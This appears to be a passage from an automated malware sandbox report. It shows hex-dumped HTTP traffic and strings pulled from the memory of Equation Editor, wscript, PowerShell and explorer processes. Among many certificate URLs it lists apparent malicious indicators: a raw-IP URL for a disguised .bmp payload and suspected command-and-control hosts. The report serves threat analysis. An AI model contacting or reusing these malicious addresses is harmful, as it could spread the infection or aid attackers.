72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Tue, 28 May 2024 07:30:03 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Tue, 28 May 2024 07:30:08 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 07:30:55 GMTServer: Apache/2.4.59 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 64 38 38 0d 0a b9 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 9c 8d b7 27 5d c1 30 78 b2 34 fc 64 ca 38 5b 03 cf 4b a0 90 08 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 07:31:05 GMTServer: Apache/2.4.59 (Debian)Content-Length: 409Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
            Source: EQNEDT32.EXE, 00000008.00000002.418954890.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.177.156/9090/lionsarekingofjungleimageshere.bmp
            Source: EQNEDT32.EXE, 00000008.00000002.418954890.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.177.156/9090/lionsarekingofjungleimageshere.bmpCa
            Source: EQNEDT32.EXE, 00000008.00000002.418954890.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.177.156/9090/lionsarekingofjungleimageshere.bmpj
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: explorer.exe, 0000000E.00000002.618110460.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.471758119.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
            Source: explorer.exe, 0000000E.00000002.620228851.00000000079A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://mbhaudjprbp.net/
            Source: explorer.exe, 0000000E.00000002.620228851.00000000079A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://mbhaudjprbp.net/application/x-www-form-urlencodedMozilla/5.0
            Source: powershell.exe, 0000000C.00000002.461385343.00000000031D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: explorer.exe, 00000012.00000002.533939539.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
            Source: explorer.exe, 00000012.00000002.533939539.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
            Source: explorer.exe, 0000000E.00000002.620228851.0000000007916000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.533939539.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.519823879.00000000000DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.524986516.0000000000824000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.618324003.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.565061083.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.618284548.0000000000314000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.618129405.000000000029E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.618251416.0000000000824000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.618233740.00000000003AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
            Source: explorer.exe, 00000012.00000002.533939539.0000000000914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php1
